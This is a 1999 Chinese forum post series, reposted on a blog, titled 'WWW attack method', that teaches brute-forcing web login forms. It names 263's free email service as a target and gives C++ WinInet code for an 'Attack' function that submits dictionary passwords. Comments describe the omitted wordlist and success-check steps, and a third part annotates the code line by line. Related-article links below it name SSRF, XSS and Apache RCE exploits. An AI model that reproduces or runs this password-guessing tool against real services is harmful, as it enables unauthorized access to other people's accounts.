WWW攻击法

简介:
这儿的WWW攻击只限一般站点的攻击
对于采用安全连接的站点还没有试过
一个很好的实践的目标就是各种支持WWW的免费邮件
如果你想用它来进入黄色站点
那也没办法 :)
一般的站点中
如果你想浏览某些需要授权的内容
首先要经过身份验证这一步
就是让你输入用户名、密码
然后浏览器会根据HTML文件中FORM的定义
把这些信息发给服务器来验证
一般的办法是GET或POST
比如在263中
请看下面的263 HTML源代码
      
        用户名: @263.net 口令:   
如果点击"请进吧!",浏览器会向服务器发送一下请求
POST /prog/login/?user=aaa@pass=bbb
既然知道了原理
那我们就可以模拟用户点击的过程

Welcome to NANKAIBBS发信人: bbb (九万里风鹏路), 信区: SysSafe
标 题: WWW攻击法(二)
发信站: 我爱南开站 (Wed Nov 3 08:45:57 1999), 转信

微软给我们提供了一套现成的API让我们可以使用HTTP协议而不需通读RFC文档
现在
我们就可以发动进攻了
请看源程序
不想灌水
我把该程序中读字典的部分和判断攻击是否成功的部分省掉了
但都作了注释
const TCHAR szHeaders[] ="Accept: text/*\r\nUser-Agent: URLHacker\r\n";
//pServer是目标主机名
//cszPostData就是剩下的部分
//比如攻击263的免费邮箱,那么
//pServer="freemail.263.net"
//cszPostData="/prog/login?user=tom&pass=fuck"
//当然,你要先读字典文件,读取pass的值
void Attack(LPSTR pServer,LPSTR cszPostData)
{
    // Open Internet session.
    HINTERNET hSession = ::InternetOpen("URLHacker",
                INTERNET_OPEN_TYPE_PRECONFIG,
                NULL,
                INTERNET_INVALID_PORT_NUMBER,
                0) ;
    // Connect to dest.
    HINTERNET hConnect = ::InternetConnect(hSession,
                pServer,
                INTERNET_INVALID_PORT_NUMBER,
                "",
                "",
                INTERNET_SERVICE_HTTP,
                0,
                0) ;
    // Request the file from the server.
    HINTERNET hHttpFile = ::HttpOpenRequest(hConnect,
                "GET",
                cszPostData,
                HTTP_VERSION,
                NULL,
                0,
                INTERNET_FLAG_DONT_CACHE,
                0) ;
    // Add request headers
    BOOL bAddHeaders = ::HttpAddRequestHeaders(hConnect,szHeaders,lstrlen(szHea
ders),HTTP_ADDREQ_FLAG_ADD);
    // Send the request.
    BOOL bSendRequest = ::HttpSendRequest(hHttpFile, NULL, 0, 0, 0);
    // Get the length of the file.
    char szBuffer[80] ;
    DWORD dwLen = sizeof(szBuffer);
    DWORD dwIndex;
    BOOL bRet = HttpQueryInfo(hHttpFile, HTTP_QUERY_STATUS_CODE,
                szBuffer, &dwLen, NULL);
    DWORD dwRet;
    if (bRet)
          dwRet = (DWORD) atol(szBuffer);
    if (dwRet == HTTP_STATUS_DENIED){
    //这是另外一种验证的办法,和系统的用户名、口令结合起来
    //InternetConnect中第3、4个参数就是用户名和口令
    //下面怎么做不用我说了吧
    }
    if (HttpQueryInfo(hHttpFile, HTTP_QUERY_RAW_HEADERS_CRLF, NULL, &dwLen, 0))

          bRet = TRUE;
    else
    {
          // now that we know how long it is, ask for exactly that much
          // space and really request the header from the API
          LPTSTR pstr = new TCHAR[dwLen];
          bRet = HttpQueryInfo(hHttpFile, HTTP_QUERY_RAW_HEADERS_CRLF, pstr, &dwLen,
&dwIndex);
          delete []pstr;
    }
    // were we redirected?
    // these response status codes come from WININET.H
    if (dwRet == HTTP_STATUS_MOVED ||
          dwRet == HTTP_STATUS_REDIRECT ||
          dwRet == HTTP_STATUS_REDIRECT_METHOD)
    {
    //被重定向到其它地址,需要重新连接到新的地址
    }
          
    // Convert length from ASCII string to a DWORD.
    // Allocate a buffer for the file.
    char* buffer = new char[dwLen+1] ;
    // Read the file into the buffer.
    DWORD dwBytesRead ;
    BOOL bRead = ::InternetReadFile(hHttpFile,
                    buffer,
                    dwLen+1,
                    &dwBytesRead);
    //可以在这儿根据读到的内容判断攻击是否成功
    //怎么?不会!
    //试一下手工猜口令,肯定给你一个出错的画面
    //如果读到的内容中不包括那些错误信息,就又可能成功了
    delete [] buffer;
    ::InternetCloseHandle(hHttpFile);
    ::InternetCloseHandle(hConnect) ;
    ::InternetCloseHandle(hSession) ;
}

Welcome to NANKAIBBS发信人: bbb (九万里风鹏路), 信区: SysSafe
标 题: WWW攻击法(三)—注解
发信站: 我爱南开站 (Wed Nov 3 08:58:58 1999), 转信

创建一个会话
HINTERNET hSession = ::InternetOpen(
        "URLHacker",//Agent名,随便取
        INTERNET_OPEN_TYPE_PRECONFIG,//使用定义的连接方式
        NULL,
        INTERNET_INVALID_PORT_NUMBER,
        0) ;
连接到服务器
HINTERNET hConnect = ::InternetConnect(
        hSession,
        pServer,//服务器名
        INTERNET_INVALID_PORT_NUMBER,
        "",//用户名
        "",//口令
        INTERNET_SERVICE_HTTP,//HTTP
        0,
        0);
向服务器发出请求
HINTERNET hHttpFile = ::HttpOpenRequest(hConnect,
        "GET",//可用GET或POST
          cszPostData,//对应于HTTP命令 GET cdzPostData
          HTTP_VERSION,
          NULL,
          0,
          INTERNET_FLAG_DONT_CACHE,
          0);
加一个请求头,自我炫耀一下,hehe
BOOL bAddHeaders = ::HttpAddRequestHeaders(hConnect,szHeaders,lstrlen(szHead
ers),HTTP_ADDREQ_FLAG_ADD);

接下来,查询该请求返回的信息,然后读之。





















本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8543,如需转载请自行联系原作者


相关文章
|
7月前
|
域名解析 缓存 网络协议
DNS Rebinding Attack 绕过SSRF限制
DNS Rebinding Attack 绕过SSRF限制
|
安全
2021Kali系列 -- XSS漏洞(Beef-xss)
2021Kali系列 -- XSS漏洞(Beef-xss)
98 0
2021Kali系列 -- XSS漏洞(Beef-xss)
|
XML 供应链 安全
Apache Jena XXE漏洞(CVE-2022-28890)
Apache Jena XXE漏洞(CVE-2022-28890)
|
安全 Apache
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
影响版本 Apache 2.4.49 Apache 2.4.50 当前描述 发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。 环境搭建可以查看我的上一篇文章 https://developer.aliyun.com/article/11136
300 0
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
|
安全 PHP
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
170 0
|
Web App开发 监控 安全
Web服务器如何防CC攻击?
CC攻击是DDOS(分布式拒绝服务)的一种,相比其它的DDOS攻击CC似乎更有技术含量一些。这种攻击你见不到虚假IP,见不到特别大的异常流量,但造成服务器无法进行正常连接,听说一条ADSL足以搞掂一台高性能的Web服务器。
1460 1
|
网络协议
NTP方式对https的攻击手法介绍
目前https的普遍性越来越多,随之而来的攻击方式也新颖起来,本章详细介绍下NTP攻击方式。
253 0
NTP方式对https的攻击手法介绍
|
Web App开发 域名解析 监控
怎么防护才能避免WEB服务器被CC攻击呢?
CC攻击是什么?那怎么做防护才能避免WEB服务器被CC攻击呢?今天墨者安全给大家分享下对CC攻击的见解吧!
|
SQL 安全 关系型数据库